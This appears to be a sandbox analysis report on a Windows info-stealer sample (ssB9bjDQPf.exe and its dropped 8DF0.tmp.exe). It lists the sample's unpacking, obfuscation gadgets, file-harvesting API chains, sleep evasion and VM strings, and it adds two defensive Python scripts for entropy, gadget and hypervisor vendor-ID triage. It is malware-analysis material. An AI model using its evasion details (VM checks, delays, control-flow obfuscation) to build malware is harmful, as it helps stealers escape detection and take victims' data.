Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Sections loaded (in load order): apphelp.dll, msimg32.dll, msvcr100.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Unpacked PE file: 3.2.8DF0.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Unpacked PE file: 0.2.ssB9bjDQPf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Unpacked PE file: 3.2.8DF0.tmp.exe.400000.0.unpack
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00410766 push ecx; ret 0_2_00410779
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00AFF1BA pushad ; ret 0_2_00AFF1D6
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00AFF338 push ecx; ret 0_2_00AFF355
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00AFC70C pushad ; ret 0_2_00AFC734
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00AFCBAD push 00000003h; ret 0_2_00AFCBB1
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00AFAE02 push es; iretd 0_2_00AFAE13
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_025009CD push ecx; ret 0_2_025009E0
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0252799F push esp; retf 0_2_025279A7
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0250CE18 push ss; retf 0_2_0250CE1D
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_024FFFF3 push ecx; ret 0_2_02500006
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_02527F9D push esp; retf 0_2_02527F9E
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0252DDDE push dword ptr [esp+ecx-75h]; iretd 0_2_0252DDE2
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_02529DE8 pushad ; retf 0_2_02529DEF
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0092DDDC pushad ; iretd 3_2_0092DE59
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_009304E2 pushad ; retf 3_2_009304E3
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0092DCE7 push B35707CFh; iretd 3_2_0092DDDB
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0092DCE7 pushad ; iretd 3_2_0092DE59
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0092F6E5 push edx; iretd 3_2_0092F6F6
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0092EBEE push ebp; iretd 3_2_0092EC21
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_00930524 push ebx; iretd 3_2_0093054F
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0092BD48 push ebx; ret 3_2_0092BDAD
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0092CD68 push 00000032h; retf 3_2_0092CD6A
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_024A7B2C push ecx; ret 3_2_024A7B3F
Source: ssB9bjDQPf.exe | Static PE information: section name: .text entropy: 7.554689479421369
Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .text entropy: 7.107429808843349
Source: 8DF0.tmp.exe.0.dr | Static PE information: section name: .text entropy: 7.107429808843349
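Two of the indicators in this section can be reproduced on any sample without a sandbox. The first is section entropy: 7.55 bits per byte for the .text section of ssB9bjDQPf.exe is well above the roughly 6.0 to 6.5 of ordinary compiled x86 code, which is why the report treats the file as packed. The second is the list of push/ret, push/retf and push/iretd sequences: a lone push ecx; ret is how the MSVC __EH_epilog3 helpers return and is harmless, but compilers do not emit retf or iretd in user-mode code, and a cluster of such pairs in regions outside the mapped image (the 0_2_00AF... and 3_2_0092... addresses above) is control-flow obfuscation. The script below is an added example, not code from Joe Sandbox or from the sample: using the standard library only, it walks the PE section table, computes each section's entropy, scans executable sections for adjacent push/ret pairs, and flags sections that are both writable and executable, which is what "changes PE section rights" refers to. The 7.0 threshold and the opcode tables are assumptions; the self-test constructs a minimal PE image rather than reading the real sample; and the scan is a linear byte scan, not a disassembly, so it misses non-adjacent pairs (the pair reported at 3_2_0092DCE7 / 3_2_0092DDDB is 244 bytes apart) and can match bytes inside immediates.

```python
import math
import struct
import sys

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
ENTROPY_THRESHOLD = 7.0   # assumed cut-off for "likely packed"; tune on your own corpus

# push opcodes with their encoded length (0x06/0x0E/0x16/0x1E push segment
# registers, 0x60 is pushad) and the return opcodes that complete a gadget.
PUSH_LEN = {0x68: 5, 0x6A: 2, 0x60: 1, 0x06: 1, 0x0E: 1, 0x16: 1, 0x1E: 1}
PUSH_LEN.update({op: 1 for op in range(0x50, 0x58)})   # push eax .. push edi
RET_OPS = {0xC3: "ret", 0xC2: "ret imm16", 0xCB: "retf", 0xCA: "retf imm16", 0xCF: "iretd"}
NEVER_IN_USER_MODE = {"retf", "retf imm16", "iretd"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(blob: bytes):
    """Yield (name, characteristics, raw bytes) for each PE section table entry."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew, = struct.unpack_from("<I", blob, 0x3C)
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections, = struct.unpack_from("<H", blob, coff + 2)
    opt_size, = struct.unpack_from("<H", blob, coff + 16)
    table = coff + 20 + opt_size          # section table follows the optional header
    for i in range(nsections):
        off = table + 40 * i
        name = blob[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", blob, off + 16)
        chars, = struct.unpack_from("<I", blob, off + 36)
        yield name, chars, blob[raw_ptr:raw_ptr + raw_size]


def push_ret_gadgets(code: bytes):
    """Linear scan for a push immediately followed by a return (no disassembly)."""
    hits = []
    for i, op in enumerate(code):
        length = PUSH_LEN.get(op)
        if length is None or i + length >= len(code):
            continue
        kind = RET_OPS.get(code[i + length])
        if kind:
            hits.append((i, kind))
    return hits


def assess(blob: bytes, threshold: float = ENTROPY_THRESHOLD):
    """Return [(section, entropy, gadget_count, [flags])] for every section."""
    report = []
    for name, chars, data in pe_sections(blob):
        executable = bool(chars & IMAGE_SCN_MEM_EXECUTE)
        entropy = round(shannon_entropy(data), 3)
        gadgets = push_ret_gadgets(data) if executable else []
        flags = []
        if executable and entropy >= threshold:
            flags.append("high-entropy code section (likely packed)")
        if executable and chars & IMAGE_SCN_MEM_WRITE:
            flags.append("section is writable and executable")
        if any(kind in NEVER_IN_USER_MODE for _, kind in gadgets):
            flags.append("push/retf or push/iretd gadget (control-flow obfuscation)")
        report.append((name, entropy, len(gadgets), flags))
    return report


def build_test_pe(sections):
    """Constructed, non-loadable PE image carrying only the headers this parser reads."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    data_start = e_lfanew + 4 + 20 + 40 * len(sections)
    table, body = bytearray(), bytearray()
    for name, chars, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(data), 0, len(data),
                             data_start + len(body), 0, 0, 0, 0, chars)
        body += data
    return bytes(dos) + b"PE\0\0" + coff + bytes(table) + bytes(body)


if __name__ == "__main__":
    # Constructed sample when no path is given: a packed-looking .text and a plain .data.
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_pe([
        (b".text", 0x60000020, bytes(range(256)) * 16),
        (b".data", 0xC0000040, b"\0" * 512),
    ])
    for name, entropy, gadgets, flags in assess(image):
        print(f"{name:8} entropy={entropy:5.3f} push/ret={gadgets:3} {', '.join(flags)}")
```

Point it at a file to get one line per section; on ssB9bjDQPf.exe it should reproduce the 7.55 figure above and flag .text. The gadget count is only meaningful relative to section size and toolchain, so compare it against a known-good build from the same compiler before alerting on it.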
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | File created: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Process information set: NOOPENFILEERRORBOX (reported twice)
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Window / User API: threadDelayed 1649
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Window / User API: threadDelayed 8339
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-65694
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Evasive API call chain: GetSystemTime,DecisionNodes | graph_3-33520
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | API coverage: 5.1 %
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | API coverage: 2.9 %
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe TID: 3324 | Thread sleep count: 1649 > 30
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe TID: 3324 | Thread sleep time: -1190578s >= -30000s
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe TID: 3324 | Thread sleep count: 8339 > 30
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe TID: 3324 | Thread sleep time: -6020758s >= -30000s
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Last function: Thread delayed
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_02528C59 FindFirstFileExW,0_2_02528C59
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_02491EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_02491EA7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0249CF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_0249CF47
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_02493F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_02493F27
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0248DFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_0248DFD7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_02481807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_02481807
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_02481820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_02481820
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_02491827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_02491827
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0249D8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_0249D8A7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0249E0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,3_2_0249E0B7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_02495127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_02495127
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0249E597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_0249E597
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_024A33F7 GetSystemInfo,wsprintfA,3_2_024A33F7
                  Source: Amcache.hve.7.dr | Binary or memory string: VMware
                  Source: 8DF0.tmp.exe, 00000003.00000002.1833942307.000000000099C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW9
                  Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin
                  Source: Amcache.hve.7.dr | Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                  Source: Amcache.hve.7.dr | Binary or memory string: VMware, Inc.
                  Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.7.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.7.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.7.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B5A000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, 8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 8DF0.tmp.exe, 00000003.00000002.1833942307.000000000099C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: Amcache.hve.7.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.7.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.7.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.7.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: 8DF0.tmp.exe, 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwaree
                  Source: Amcache.hve.7.dr | Binary or memory string: vmci.sys
                  Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.7.dr | Binary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.7.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1
                  Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.7.dr | Binary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: 8DF0.tmp.exe, 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                  Source: Amcache.hve.7.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.7.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.7.dr | Binary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.7.dr | Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.7.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.7.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
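The VM-related strings above come from two very different places, and the report lists them side by side. The hits in Amcache.hve.7.dr are the analysis VM's own hardware inventory, written by Windows during the run; they say nothing about what the sample does. The hit that matters is "VMwareVMware" in 8DF0.tmp.exe memory at 0x92A000, which is the 12-byte vendor ID that CPUID leaf 0x40000000 returns in EBX:ECX:EDX on VMware guests, and "Hyper-V RAW" is the Winsock catalog name of the hvsocket provider, present in any process that has loaded the protocol catalog. The following Python is an added example, not part of the Joe Sandbox report or the Stealc sample: it decodes the CPUID registers, scans a memory blob for known vendor IDs, and attributes each hit by source. The memory region, the register values and the source-suffix interpretation (.sdmp = process memory dump, .N.dr = file written during the run) are this example's assumptions.

```python
"""Hypervisor vendor-ID triage for VM strings found in a sandbox run (added example)."""
import re

# CPUID leaf 0x40000000 vendor IDs: EBX, ECX, EDX stored little-endian and concatenated.
HYPERVISOR_VENDOR_IDS = {
    b"VMwareVMware": "VMware",
    b"Microsoft Hv": "Hyper-V",
    b"KVMKVMKVM\x00\x00\x00": "KVM",
    b"XenVMMXenVMM": "Xen",
    b"VBoxVBoxVBox": "VirtualBox",
    b"TCGTCGTCGTCG": "QEMU (TCG)",
}

# Strings that look like VM evidence but are produced by the OS, not by the sample.
BENIGN_VM_STRINGS = {b"Hyper-V RAW": "Winsock hvsocket provider name"}


def vendor_from_cpuid(ebx: int, ecx: int, edx: int) -> str:
    """Rebuild the vendor ID from the three CPUID output registers and name it."""
    raw = b"".join(r.to_bytes(4, "little") for r in (ebx, ecx, edx))
    return HYPERVISOR_VENDOR_IDS.get(raw, "unknown:" + repr(raw))


def find_vm_strings(blob: bytes) -> list[tuple[int, str, str]]:
    """Return (offset, matched string, meaning) for every known VM string in blob."""
    hits = []
    for needle, meaning in list(HYPERVISOR_VENDOR_IDS.items()) + list(BENIGN_VM_STRINGS.items()):
        for m in re.finditer(re.escape(needle), blob):
            hits.append((m.start(), needle.decode("latin-1"), meaning))
    return sorted(hits)


def attribute_source(source: str) -> str:
    """Classify a Joe Sandbox 'Source:' field (assumed format: .sdmp = process memory,
    .N.dr = file written during the run). Amcache.hve is maintained by Windows and
    lists the VM's own devices, so VMware strings there are not the sample's doing."""
    if source.endswith(".sdmp"):
        return "sample process memory"
    if re.search(r"\.\d+\.dr$", source):
        return "file written during the run (analysis-VM artifact)"
    return "unknown"


def triage(source: str, blob: bytes) -> list[str]:
    """One line per hit, marking which ones are evidence of a VM check by the sample."""
    where = attribute_source(source)
    out = []
    for off, s, meaning in find_vm_strings(blob):
        evidence = where == "sample process memory" and s.encode("latin-1") in HYPERVISOR_VENDOR_IDS
        verdict = "hypervisor vendor ID in sample memory" if evidence else "not attributable to the sample"
        out.append(f"{source}+0x{off:x}: {s!r} ({meaning}) [{verdict}]")
    return out


# Constructed memory region (not the real dump): the vendor ID with the stray trailing
# byte the report shows ("VMwareVMwaree"), the Winsock provider name, and a KVM ID.
SAMPLE_REGION = b"\x00" * 16 + b"VMwareVMwaree\x00" + b"Hyper-V RAW\x00" + b"KVMKVMKVM\x00\x00\x00"
SAMPLE_SOURCE = "8DF0.tmp.exe, 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp"

if __name__ == "__main__":
    print(vendor_from_cpuid(0x61774D56, 0x4D566572, 0x65726177))   # VMware
    for line in triage(SAMPLE_SOURCE, SAMPLE_REGION) + triage("Amcache.hve.7.dr", SAMPLE_REGION):
        print(line)
```

The register values in the usage call are simply "VMwareVMware" split into three little-endian dwords; on a real host they come from executing CPUID with EAX=0x40000000, which is why a 12-byte vendor ID lying in a sample's data region is a stronger signal than any number of driver names in Amcache.hve.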
